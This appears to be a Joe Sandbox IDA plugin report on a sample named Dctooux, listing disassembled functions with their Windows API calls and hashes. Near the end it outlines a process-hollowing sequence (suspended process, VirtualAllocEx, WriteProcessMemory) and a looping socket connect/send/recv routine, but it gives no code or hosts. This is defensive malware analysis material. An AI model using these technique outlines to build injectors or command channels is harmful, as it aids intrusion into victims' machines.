Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutexObjectSingleSleepWait
String ID: m
API String ID: 3807984492-3593511296
Opcode ID: 1a1c53d420f98ae444857943ad1f3f2f1b3e01a553a80385594a640299bb745d
Instruction ID: 5e86512a9e3622a86aa5ee473e558b5bb0bb0a12a1497a46ffa3239d3a151674
Opcode Fuzzy Hash: 1a1c53d420f98ae444857943ad1f3f2f1b3e01a553a80385594a640299bb745d
Instruction Fuzzy Hash: 2E313B717001448BEB1CCB78DE8475CBBB2BFA5312F248318E811D77D5D77699848752

Uniqueness

Uniqueness Score: -1.00%

Function 00A5A7B8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107synchronizationsleepCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00A5A7BB
Sleep.KERNELBASE(000003E8), ref: 00A5AD05
CreateMutexA.KERNELBASE(00000000,00000000,00AB61D8), ref: 00A5AD23
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00A5AD2C
GetLastError.KERNEL32 ref: 00A5AD32

Strings

m, xrefs: 00A5AC9E

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutexObjectSingleSleepWait
String ID: m
API String ID: 3807984492-3593511296
Opcode ID: 08a7de411caf8ceb6ceecd1a511069c407e434cca07d70977e01e7387cfe0f61
Instruction ID: 3be2d6aa853ae056a68a2dfe0dcdba25001119862be25b784073bf13c0c9dc8f
Opcode Fuzzy Hash: 08a7de411caf8ceb6ceecd1a511069c407e434cca07d70977e01e7387cfe0f61
Instruction Fuzzy Hash: A3314971B001448BEB0CDBBCCE8579CBB72BF95312F208318E811977D6DB7989898752

Uniqueness

Uniqueness Score: -1.00%

Function 00A5A8ED Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106synchronizationsleepCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00A5A8F0
Sleep.KERNELBASE(000003E8), ref: 00A5AD05
CreateMutexA.KERNELBASE(00000000,00000000,00AB61D8), ref: 00A5AD23
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00A5AD2C
GetLastError.KERNEL32 ref: 00A5AD32

Strings

m, xrefs: 00A5AC9E

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutexObjectSingleSleepWait
String ID: m
API String ID: 3807984492-3593511296
Opcode ID: edcf0674f11dc12c3ff76c482d34341ad7f4170d6f75d98ad62c5160679f97c2
Instruction ID: 1deba4317df2774819a7a85f91d1b32bd9eb3197826597e831c25ddacfcf3087
Opcode Fuzzy Hash: edcf0674f11dc12c3ff76c482d34341ad7f4170d6f75d98ad62c5160679f97c2
Instruction Fuzzy Hash: 653138717001048BEB0CDBB8CE8979CBB72BF92316F208319E851973D6C73A99898712

Uniqueness

Uniqueness Score: -1.00%

Function 00A5AA22 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105synchronizationsleepCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00A5AA25
Sleep.KERNELBASE(000003E8), ref: 00A5AD05
CreateMutexA.KERNELBASE(00000000,00000000,00AB61D8), ref: 00A5AD23
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00A5AD2C
GetLastError.KERNEL32 ref: 00A5AD32

Strings

m, xrefs: 00A5AC9E

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutexObjectSingleSleepWait
String ID: m
API String ID: 3807984492-3593511296
Opcode ID: 6415cd2f9c2aac977f5ac08716914470a380b840f8bdbfac1e8df5a0a816bc30
Instruction ID: 8f3a91f283e9b5555728f77bccb3c14d2bd6834b99c9734d42d000ea3099c883
Opcode Fuzzy Hash: 6415cd2f9c2aac977f5ac08716914470a380b840f8bdbfac1e8df5a0a816bc30
Instruction Fuzzy Hash: D63105717001448BEB1CDBB8DE8979DFB72BB91312F208318E8119B3D5D7769988C752

Uniqueness

Uniqueness Score: -1.00%

Function 00A5AB57 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104synchronizationsleepCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00A5AB5A
Sleep.KERNELBASE(000003E8), ref: 00A5AD05
CreateMutexA.KERNELBASE(00000000,00000000,00AB61D8), ref: 00A5AD23
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00A5AD2C
GetLastError.KERNEL32 ref: 00A5AD32

Strings

m, xrefs: 00A5AC9E

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutexObjectSingleSleepWait
String ID: m
API String ID: 3807984492-3593511296
Opcode ID: c224c119e6e2100351ceba11f7041164ce59b5e67d29279de9a24185fc1b4937
Instruction ID: 1fa385559ee375f48fb51cbced7c5e86ff8b03c035e5998258046ed554f177a9
Opcode Fuzzy Hash: c224c119e6e2100351ceba11f7041164ce59b5e67d29279de9a24185fc1b4937
Instruction Fuzzy Hash: 943103717002049BEB0CCBB8CE897ADBB73BB92312F208318E8119B3D5D73589888752

Uniqueness

Uniqueness Score: -1.00%

Function 00A881B9 Relevance: 3.1, APIs: 2, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b318ba9254fb0ccee3ffe30c0146d6a0ec324b9a407971440ab86bdbf3ab702
Instruction ID: 8819f7aae4575077bfd890332cfe97ada87536409eea96ef64aa9933688bc840
Opcode Fuzzy Hash: 1b318ba9254fb0ccee3ffe30c0146d6a0ec324b9a407971440ab86bdbf3ab702
Instruction Fuzzy Hash: 4F21F832904608BFEB11BB649D42BAE3729AF41774F600310F9343B1D1EF785E059761

Uniqueness

Uniqueness Score: -1.00%

Function 00A88491 Relevance: 3.1, APIs: 2, Instructions: 54timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,00A883C8,?,?,00000000,00000000), ref: 00A884BF
SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,00A883C8,?,?,00000000,00000000), ref: 00A884D3

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 58f8f4fead83063af8b8fc863e8340de7414f8ab4f56e02617b905811a258847
Instruction ID: 823fe7782b7ccf5fd0563eea45282d35ab3e591ad430448bcf2c2962ed9633ee
Opcode Fuzzy Hash: 58f8f4fead83063af8b8fc863e8340de7414f8ab4f56e02617b905811a258847
Instruction Fuzzy Hash: 2711E87290010DABCB14EFE5C984EDF77BCAF08310F504266E516E6190EF38EA45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A5E5C0 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e04b71fb9cb558a14550f16c42f77151623ebe68885db4f75d80ac7845bfb9df
Instruction ID: 93c1340ef2e1dedffb80e55287088d5e546b69223b94b525bed170ac72b307cb
Opcode Fuzzy Hash: e04b71fb9cb558a14550f16c42f77151623ebe68885db4f75d80ac7845bfb9df
Instruction Fuzzy Hash: DD419A70904228DBEB25DB24CD48BDEBBB5AB19300F5402D8D84967282DB755F88CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A8810B Relevance: 1.6, APIs: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A8BA51: GetLastError.KERNEL32(?,75295780,?,00A87D9A,75295780,00000000,?,?,00A889CE,00A56B19,00000000,75295780), ref: 00A8BA56
Part of subcall function 00A8BA51: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00A889CE,00A56B19,00000000,75295780), ref: 00A8BAF4

_free.LIBCMT ref: 00A881AE

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: bc9ad1d9a8e4301afa69204a06b5652767e8981f75f7f07905f38d45da1d5744
Instruction ID: 1b533a84cd5b407c0f3d45b568fdb8ca6cdea8cc8ffa786d63ad11bc607044ba
Opcode Fuzzy Hash: bc9ad1d9a8e4301afa69204a06b5652767e8981f75f7f07905f38d45da1d5744
Instruction Fuzzy Hash: 1811A772D05218AFDF11BBB4DD097ADBBB4AF04320F604256F914A61D1EF748E418B91

Uniqueness

Uniqueness Score: -1.00%

Function 00A8C033 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00A8C06D

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 2b4a47fe1da68cd8d9b2f804877570cee7f3bd68fc5afceb7464eab58c097f9f
Instruction ID: 25ad8d31faf78dde13a5a8aa5e8392490b703fe666707b0ba18dc1b2189dc820
Opcode Fuzzy Hash: 2b4a47fe1da68cd8d9b2f804877570cee7f3bd68fc5afceb7464eab58c097f9f
Instruction Fuzzy Hash: D6111575A0420AAFCF05DF58E94199A7BF8EF48314F1440AAF809AB252D671EA11CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A87E94 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00A87EF3

Part of subcall function 00A8CA35: DeleteFileW.KERNELBASE(00A87EE7,?,00A87EE7,?,?,?,74DF0F00), ref: 00A8CA3D
Part of subcall function 00A8CA35: GetLastError.KERNEL32(?,00A87EE7,?,?,?,74DF0F00), ref: 00A8CA47
Part of subcall function 00A8CA35: __dosmaperr.LIBCMT ref: 00A8CA4E

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast__dosmaperr_free
String ID:
API String ID: 3353641461-0
Opcode ID: 0a2da1b0c521b60182638c3e9a8ff40ca328a71290d8a86de22e0f6678170c9e
Instruction ID: d43e190d28ae6bc03265f6287a1d5b2d1b07d2ba868b19e2ccf5b0eecc23022a
Opcode Fuzzy Hash: 0a2da1b0c521b60182638c3e9a8ff40ca328a71290d8a86de22e0f6678170c9e
Instruction Fuzzy Hash: D5013171D09119AECF11FBB8DD017AEBFF4AF44360F2441A6F815E2192EA70CE449B91

Uniqueness

Uniqueness Score: -1.00%

Function 00A92E0E Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A92E71

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 0da8171cac030f6b45925a7c5248a00485fab8e2398974f4a4f83c3fb58f0ae8
Instruction ID: 9f643df7bcb586289562bc8e58c3b90430a9d732583b5920de0c658a0371741b
Opcode Fuzzy Hash: 0da8171cac030f6b45925a7c5248a00485fab8e2398974f4a4f83c3fb58f0ae8
Instruction Fuzzy Hash: 7A01E872D05159BFCF02EFA88D41AEE7FF5AF08310F144166B914A21A1E6318A65DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A8C42B Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00A67EF7,?,?,00A6E851,00A67EF7,?,00A68D7B,8B18EC84,74DF0F00), ref: 00A8C45D

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e2ff53c3fef45c7d2394a8ee9b3ac3cb6711f940a130650541de4dc8ac515365
Instruction ID: 3443253cbfda169d1db90dbbd6aade40f38405242af01fc0d9686060c88b8ceb
Opcode Fuzzy Hash: e2ff53c3fef45c7d2394a8ee9b3ac3cb6711f940a130650541de4dc8ac515365
Instruction Fuzzy Hash: CDE0E5311001225AEB203765AC2CBBB7648AB427B0F104210EC45970D2CB70DC809BF1

Uniqueness

Uniqueness Score: -1.00%

Function 00A92B55 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00A92F45,?,?,00000000,?,00A92F45,00000000,0000000C), ref: 00A92B72

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 397d0f50d9bec699cc86ec3e93edbb6691e60d666f88f8895ceacdcf1b8bdeea
Instruction ID: 0fe902391fcc077c6665be08f3f9c88a29a029fe7bdc3f43ef8a20d130c77e00
Opcode Fuzzy Hash: 397d0f50d9bec699cc86ec3e93edbb6691e60d666f88f8895ceacdcf1b8bdeea
Instruction Fuzzy Hash: 50D06C3200410DBBDF028F84DC06EDA3BAAFB48714F014000BA1856060C732E932AB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A67EB0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE ref: 00A67F35

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: e1ab7a406ee694be57cb383d2c3e1eebd61149048449510b13eec36af630d15c
Instruction ID: 849c48955371374e0534f321630c667c5178a34b0e19359855e19783bff97de0
Opcode Fuzzy Hash: e1ab7a406ee694be57cb383d2c3e1eebd61149048449510b13eec36af630d15c
Instruction Fuzzy Hash: 2FF08171E00A04ABC711BBBCCE0375D7BB9AB42B24F900758EC11672D3DB356A0587D2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A5EFB0 Relevance: 25.8, APIs: 17, Instructions: 344networksleepCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,?,00000004,00000000), ref: 00A5EFFB
recv.WS2_32(00000000,?,00000008,00000000), ref: 00A5F030
recv.WS2_32(00000000,?,00000001,00000000), ref: 00A5F06A
recv.WS2_32(00000000,?,?,00000000), ref: 00A5F0BA
send.WS2_32(?,?,?,00000000), ref: 00A5F211
closesocket.WS2_32(?), ref: 00A5F221
__Mtx_unlock.LIBCPMT ref: 00A5F22C
WSAStartup.WS2_32(00000002,?), ref: 00A5F2BD
htons.WS2_32(00000000), ref: 00A5F2F1
inet_pton.WS2_32(00000002,00AB63E8,?), ref: 00A5F304
socket.WS2_32(00000002,00000001,00000000), ref: 00A5F310
connect.WS2_32(00000000,?,00000010), ref: 00A5F323
Sleep.KERNEL32(00000BB8,?,00000000,?,?,?,?,?,00000000,00A9B9D8,000000FF,?,00A5F37F), ref: 00A5F345
closesocket.WS2_32 ref: 00A5F34D
socket.WS2_32(00000002,00000001,00000000), ref: 00A5F355
connect.WS2_32(00000000,?,00000010), ref: 00A5F368
closesocket.WS2_32 ref: 00A5F3BA

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: recv$closesocket$connectsocket$Mtx_unlockSleepStartuphtonsinet_ptonsend
String ID:
API String ID: 3881961120-0
Opcode ID: dd46c441239e97199ab153e97fcd79ba1cb58899112e6ff36b951ac712155198
Instruction ID: aea34c56e3df0bcb773adfbdb9bf493ce7376d0e07d3abc5faf2771e4f600fe1
Opcode Fuzzy Hash: dd46c441239e97199ab153e97fcd79ba1cb58899112e6ff36b951ac712155198
Instruction Fuzzy Hash: 6DC1F471A002059FD710DBA8DC45BEEB7A8FF49315F04422AED15972E2E771984ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A574F0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 121memoryprocessthreadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00A5751D
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00A5757B
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00A57594
GetThreadContext.KERNEL32(?,00000000), ref: 00A575A9
ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 00A575C9
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00A5760B
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 00A57628
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A576E1

Strings

invalid stoi argument, xrefs: 00A574E0
, xrefs: 00A575C0
